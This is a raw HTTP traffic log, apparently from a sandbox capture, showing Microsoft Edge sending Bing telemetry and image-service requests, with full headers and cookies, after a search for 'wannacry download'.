HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f149
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f185
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f183
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f175
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22Time%22%3A29551%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057762%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057763%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199057765%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199057767%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22Time%22%3A29551%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 17764
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bd21f5344768d3963e8b6fb3b8d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-aU/N9sveVS8lDpjnC+dixplF1ogkt6fiDoYwYp5TR14='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:18 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824; domain=.bing.com; expires=Tue, 11-Nov-2025 21:04:18 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f182
GET

https://www.bing.com/images/sbi?mmasync=1&ig=D607FEFA2831486BA34E9C5873B1B63C&iid=.5098&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /images/sbi?mmasync=1&ig=D607FEFA2831486BA34E9C5873B1B63C&iid=.5098&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f328
GET

